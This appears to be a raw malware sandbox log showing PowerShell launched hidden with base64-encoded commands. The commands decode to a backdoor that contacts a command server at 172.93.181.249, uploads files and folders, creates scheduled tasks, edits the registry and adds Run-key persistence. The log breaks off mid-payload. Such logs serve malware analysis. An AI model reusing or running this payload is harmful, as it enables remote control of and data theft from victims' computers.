dABTAHQAcgBlAGEAbQAoACkAOwAkAGgAZQBhAGQAaQBuAGcAMQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAQwBSAEwARgApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMQAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADEALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAQwBvAG4AdABlAG4AdAAtAEQAaQBzAHAAbwBzAGkAdABpAG8AbgA6ACAAZgBvAHIAbQAtAGQAYQB0AGEAOwAgAG4AYQBtAGUAPQAnACAAKwAgAFsAcwB0AHIAaQBuAGcAXQAkACgAWwBjAGgAYQByAF0AMAB4ADIAMgApACAAKwAgACQARABiAEMAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AFAAYgB3AGoAdABTAGEAcABUAEkAQgAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADIALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAyAC4ATABlAG4AZwB0AGgAKQA7ACQAaABlAGEAZABpAG4AZwAzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAEMAUgBMAEYAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABoAGUAYQBkAGkAbgBnADMALAAgADAALAAgACQAaABlAGEAZABpAG4AZwAzAC4ATABlAG4AZwB0AGgAKQA7ACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUABVAC4AVwByAGkAdABlACgAJABDAFYAUgBxAHcAdQBmAEEAZABDAE4AcQAsACAAMAAsACAAJABiAHkAdABlAHMAUgBlAGEAZAApADsAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJABoAGUAYQBkAGkAbgBnADQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAArACAAJABDAFIATABGACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEYAbAB1AHMAaAAoACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQAuAEMAbABvAHMAZQAoACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBzAHAAbwBuAHMAZQBdACAAJAB3AEQAeQBlAGIAVQAgAD0AIAAkAGcAUgBMAFEAYQB0AEcAbwBpAGkAZgBkAFUAVAAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQAoACkAOwAkAEgATgB0AFUAZABGAFgAZABqAG0AUABnAFQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoACQAdwBEAHkAZQBiAFUALgBHAGUAdABSAGUAcwBwAG8AbgBzAGUAUwB0AHIAZQBhAG0AKAApACkAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAVQBMAFQAIAA9ACAAJABIAE4AdABVAGQARgBYAGQAagBtAFAAZwBUAGIALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9ACQAcwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsAfQBmAHUAbgBjAHQAaQBvAG4AIABoAFUAYgBVAFcAawBaAGIAWAAoACQAZQBhAGUAWAB5AGgAbABOAFcAZABhAGwAbQAsACAAJAByAE8AdQBNAEYAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAGUAYQBlAFgAeQBoAGwATgBXAGQAYQBsAG0AKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAcgBPAHUATQBGACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAAPQAgAGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACcAJwA7AEkAZgAgACgAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxACAALQBuAGUAIAAnAG4AdQBsAGwAJwAgAC0AYQBuAGQAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAIAAtAG4AZQAgACcAJwApAHsAJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAD0AJAByAHoAaQBzAFcAQQBmAFIAQQBwAFoAcgBxAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAAxACwAIAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEALgBMAGUAbgBnAHQAaAAgAC0AIAAyACkAOwAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAegBpAHMAVwBBAGYAUgBBAHAAWgByAHEAKQApADsAaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5ACkAewBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAKQB7ACQAZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAagBYAFAAVABvAEYAVABYAHIAagBRAHoAUAAgACsAIAAnAC4AYwBzAHYAJwA7AEcAZQB0AC0AQwBoAGkAbABkAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAATgBhAG0AZQAsACAATABlAG4AZwB0AGgALAAgAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUALAAgAEYAdQBsAGwAbgBhAG0AZQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQAgAC0ATgBvAFQAeQBwAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuACAALQBFAG4AYwBvAGQAaQBuAGcAIAB1AHQAZgA4ADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AbgBhAG0AZQAgAD0AIAAnAF8AZgBpAGwAZQAnADsAJABuAG8AdwB0AGkAbQBlACAAPQAgAEcAZQB0AC0ARABhAHQAZQAgAC0ARgBvAHIAbQBhAHQAIAB5AHkAeQB5AC0ATQBNAC0AZABkAF8ASABIAF8AbQBtAF8AcwBzADsAJABhAHQAdABhAGMAaABtAGUAbgB0AF8AZgBpAGwAZQBuAGEAbQBlACAAPQAgACQAbgBvAHcAdABpAG0AZQAgACsAIAAnAF8AZgBpAGwAZQBpAG4AZgBvACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAaQByADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADQAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAApAHsAJABmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABqAFgAUABUAG8ARgBUAFgAcgBqAFEAegBQACAAKwAgACcALgB6AGkAcAAnADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACAAJABmAGkAbABlAG4AYQBtAGUAIAAtAEYAbwByAGMAZQA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGQAaQByACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAGYAaQBsAGUAbgBhAG0AZQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAaQBsAGUAbgBhAG0AZQA7AH0AfQBpAGYAIAAoACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBuAGEAbQBlACAAPQAgACcAXwBmAGkAbABlACcAOwAkAG4AbwB3AHQAaQBtAGUAIAA9ACAARwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkALQBNAE0ALQBkAGQAXwBIAEgAXwBtAG0AXwBzAHMAOwAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAIAA9ACAAJABuAG8AdwB0AGkAbQBlACAAKwAgACcAXwBmAGkAbABlACcAOwB2AFMAbABvAGIAVgBsACAAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAG8AdwBuADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AGgAVQBiAFUAVwBrAFoAYgBYACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAGcAZQBkAGkAdAA6ACcAKQApAHsAJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgAPQAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA4ACkAOwAkAEMAaABhAHIAQQByAHIAYQB5ACAAPQAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAA1ACkAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgAC0ATgBhAG0AZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AIAAtAFYAYQBsAHUAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwA0AF0AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEARABCAG8AOwB9AH0AaQBmACAAKAAkAE4ARwBnAFgAbgBUAE4ATgBGAEcATAB5AC4AQwBvAG4AdABhAGkAbgBzACgAJwB0AGEAcwBrADoAJwApACkAewAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA9ACQATgBHAGcAWABuAFQATgBOAEYARwBMAHkALgBTAHUAYgBTAHQAcgBpAG4AZwAoADUAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAcgBlAG4AYQBtAGUAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANwApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABWAHgAWQBjAE4AZQBlAFoAcQBOAEIASQBBAHgALgBTAHAAbABpAHQAKAAnAHwAfAAnACkAOwBpAGYAIAAoACQAQwBoAGEAcgBBAHIAcgBhAHkALgBMAGUAbgBnAHQAaAAgAC0AZQBxACAAMwApAHsAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABDAGgAYQByAEEAcgByAGEAeQBbADAAXQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAyAF0AOwAkAE4AQQBEAHAAZABvAEcAUQBEAEIAbwAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AGYAcABCAGIAIAAkAHkAeQBWAEcAUABoAEIATABZAHAAcQBFAHoARgAgACQATgBBAEQAcABkAG8ARwBRAEQAQgBvADsAfQB9AGkAZgAgACgAJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAEMAbwBuAHQAYQBpAG4AcwAoACcAZABlAGwAOgAnACkAKQB7ACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4AD0AJABOAEcAZwBYAG4AVABOAE4ARgBHAEwAeQAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAVgB4AFkAYwBOAGUAZQBaAHEATgBCAEkAQQB4ACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFYAeABZAGMATgBlAGUAWgBxAE4AQgBJAEEAeAA7ACQATgBBAEQAcABkAG8ARwBRAEQAQgBvACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAZgBwAEIAYgAgACQAeQB5AFYARwBQAGgAQgBMAFkAcABxAEUAegBGACAAJABOAEEARABwAGQAbwBHAFEARABCAG8AOwB9AH0AfQB9AH0AIABDAGEAdABjAGgAewB9AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADcAOwB9AHcAaABpAGwAZQAoACQAdAByAHUAZQAgAC0AZQBxACAAJAB0AHIAdQBlACkA filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000324	1	1	0
ShellExecuteExW June 1, 2023, 7:53 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANgA0ADsAJABkAG8AaABlAGoAQgBBAFYAUABDAHgAcAAgAD0AIAAxADAAMgA0ACAAKgAgADEAMAAyADQAOwAkAEUAVgBQACAAPQAgACQAZQBuAHYAOgBDAE8ATQBQAFUAVABFAFIATgBBAE0ARQAgACsAIAAnAC0AJwAgACsAIAAkAGUAbgB2ADoAVQBTAEUAUgBOAEEATQBFADsAJAB5AHkAVgBHAFAAaABCAEwAWQBwAHEARQB6AEYAIAA9ACAAJwBoAHQAdABwADoALwAvADEANwAyAC4AOQAzAC4AMQA4ADEALgAyADQAOQAvAGMAbwBuAHQAcgBvAGwALwBjAG8AbQAuAHAAaABwACcAIAArACAAJwA/AFUAPQAnACAAKwAgACQARQBWAFAAOwAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAEMATABQAFQATQBkAEcAdgBpAE8ASABmAFQATAAnADsAaQBmACAAKAAhACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGoAWABQAFQAbwBGAFQAWAByAGoAUQB6AFAAKQApACAAewBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIA